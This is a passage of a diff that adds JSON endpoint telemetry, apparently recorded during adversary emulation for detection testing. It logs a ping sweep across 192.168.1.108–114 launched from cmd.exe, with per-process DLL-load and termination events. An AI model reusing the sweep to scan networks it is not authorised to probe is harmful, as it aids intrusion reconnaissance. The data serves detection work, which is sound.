1 -w 100 192.168.1.108", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "process", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572511830000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.109", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3052, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "process", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572516840000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.110", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1752, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "process", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572521990000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.111", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5964, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572522130000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "process", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572526830000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.112", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4408, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "process", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572531840000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.113", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7504, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572531980000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "process", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572536990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.114", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7652, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": 